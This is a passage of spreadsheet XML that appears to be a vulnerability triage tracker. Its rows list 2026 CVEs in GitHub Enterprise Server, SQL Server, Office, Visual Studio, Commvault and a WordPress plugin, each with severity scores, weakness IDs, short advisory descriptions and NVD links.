      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76851</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr">
        <is>
          <t>github:enterprise_server</t>
        </is>
      </c>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>A Server-Side Request Forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed remote code execution on the instance. Insufficient network isolation allowed malicious pre-receive hook code to impersonate an internal service and redirect trusted internal requests to a privileged service, leading to elevated code execution. Exploitation required pre-receive hook networking to be enabled and either site administrator privileges or write access to a repository containing a configured pre-receive hook. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.17.20, 3.18.14, 3.19.11, 3.20.7, and 3.21.5. This vulnerability was reported via the GitHub Bug Bounty program.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76851</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77105</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault, linux:linux_kernel, microsoft:windows</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>CommServe contained a cryptographic signature verification issue affecting privilege management. Software customers upgrade to resolved maintenance release. Update CommServe and Web Server.</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77105</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77106</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>commvault:commvault</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>Cvlaunchd contained a missing authorization issue affecting command execution authorization. Software customers upgrade to resolved maintenance release. Update all Commvault installations, including Commserve, Webserver, Command Center, Media Agents, Clients and HyperScale X.</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77106</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B343" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C343" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77480</t>
        </is>
      </c>
      <c r="D343" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E343" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F343" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G343" s="5" t="inlineStr"/>
      <c r="H343" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I343" s="5" t="inlineStr"/>
      <c r="J343" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K343" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L343" s="5" t="inlineStr"/>
      <c r="M343" s="5" t="inlineStr"/>
      <c r="N343" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O343" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P343" s="5" t="inlineStr"/>
      <c r="Q343" s="5" t="inlineStr">
        <is>
          <t>CWE-1220</t>
        </is>
      </c>
      <c r="R343" s="5" t="inlineStr">
        <is>
          <t>Insufficient granularity of access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S343" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77480</t>
        </is>
      </c>
    </row>
    <row r="344">
      <c r="A344" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B344" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C344" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77481</t>
        </is>
      </c>
      <c r="D344" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E344" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F344" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G344" s="5" t="inlineStr"/>
      <c r="H344" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I344" s="5" t="inlineStr"/>
      <c r="J344" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K344" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L344" s="5" t="inlineStr"/>
      <c r="M344" s="5" t="inlineStr"/>
      <c r="N344" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O344" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P344" s="5" t="inlineStr"/>
      <c r="Q344" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R344" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S344" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77481</t>
        </is>
      </c>
    </row>
    <row r="345">
      <c r="A345" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B345" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C345" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77482</t>
        </is>
      </c>
      <c r="D345" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E345" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F345" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G345" s="5" t="inlineStr"/>
      <c r="H345" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I345" s="5" t="inlineStr"/>
      <c r="J345" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K345" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L345" s="5" t="inlineStr"/>
      <c r="M345" s="5" t="inlineStr"/>
      <c r="N345" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O345" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P345" s="5" t="inlineStr"/>
      <c r="Q345" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R345" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S345" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77482</t>
        </is>
      </c>
    </row>
    <row r="346">
      <c r="A346" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B346" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C346" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77483</t>
        </is>
      </c>
      <c r="D346" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E346" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F346" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G346" s="5" t="inlineStr"/>
      <c r="H346" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I346" s="5" t="inlineStr"/>
      <c r="J346" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K346" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L346" s="5" t="inlineStr"/>
      <c r="M346" s="5" t="inlineStr"/>
      <c r="N346" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O346" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P346" s="5" t="inlineStr"/>
      <c r="Q346" s="5" t="inlineStr">
        <is>
          <t>CWE-1390</t>
        </is>
      </c>
      <c r="R346" s="5" t="inlineStr">
        <is>
          <t>Weak authentication in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S346" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77483</t>
        </is>
      </c>
    </row>
    <row r="347">
      <c r="A347" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B347" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C347" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77484</t>
        </is>
      </c>
      <c r="D347" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E347" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F347" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G347" s="5" t="inlineStr"/>
      <c r="H347" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I347" s="5" t="inlineStr"/>
      <c r="J347" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K347" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L347" s="5" t="inlineStr"/>
      <c r="M347" s="5" t="inlineStr"/>
      <c r="N347" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O347" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P347" s="5" t="inlineStr"/>
      <c r="Q347" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="R347" s="5" t="inlineStr">
        <is>
          <t>Deserialization of untrusted data in SQL Server allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S347" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77484</t>
        </is>
      </c>
    </row>
    <row r="348">
      <c r="A348" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B348" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77486</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K348" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019</t>
        </is>
      </c>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in SQL Server allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77486</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77487</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server</t>
        </is>
      </c>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>microsoft:sql_server_2017, microsoft:sql_server_2019, microsoft:sql_server_2022, microsoft:sql_server_2025</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>Improper access control in SQL Server allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77487</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77495</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3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0" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R350" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Imaging Component allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77495</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77504</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>Double free in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77504</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77826</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>The RegistrationMagic  WordPress plugin before 6.0.9.9 does not verify which application a Facebook access token was issued to before accepting it as proof of identity, allowing unauthenticated attackers to log in as an existing user whose token they can obtain, or to create and log into a new account even when user registration is disabled.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77826</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77901</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr"/>
      <c r="K353" s="5" t="inlineStr">
        <is>
          <t>microsoft:365_apps, microsoft:microsoft_365, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:word</t>
        </is>
      </c>
      <c r="L353" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Microsoft Office Word allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77901</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77906</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr"/>
      <c r="K354" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77906</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77907</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr"/>
      <c r="K355" s="5" t="inlineStr">
        <is>
          <t>microsoft:visual_studio_2026</t>
        </is>
      </c>
      <c r="L355" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Visual Studio allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77907</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77908</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>Improper control of generation of code ('code injection') in Microsoft Dynamics 365 allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77908</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78074</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
